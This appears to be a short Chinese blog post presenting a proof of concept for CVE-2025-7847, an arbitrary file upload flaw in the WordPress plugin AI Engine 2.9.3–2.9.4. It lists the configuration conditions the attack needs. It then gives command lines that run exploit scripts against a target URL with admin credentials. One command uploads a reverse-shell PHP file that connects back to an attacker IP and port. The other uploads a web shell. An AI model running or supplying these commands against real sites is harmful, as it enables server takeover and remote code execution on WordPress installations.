WordPress插件AI Engine任意文件上传漏洞利用详解

本文详细介绍了CVE-2025-7847漏洞的利用方法,针对WordPress插件AI Engine 2.9.3-2.9.4版本,提供自动化利用脚本和WebShell上传方式,需满足特定配置条件方可利用。

CVE-2025-7847 WordPress插件认证订阅者任意文件上传POC

WordPress插件AI Engine 2.9.3 - 2.9.4 概念验证

请注意,此漏洞仅在满足以下条件时才能被利用:“Public API"选项已启用(默认禁用),且未配置Bearer Token,也未添加和使用自定义身份验证来保护API。

自动化版本

1
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444

仅上传Web Shell

1
2
3
4
5
python3 exploit.py \                                                                                                                          
  --url "http://target.com/" \
  --username "Admin" \
  --password "L87*********C4u" \
  --file shell.php
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计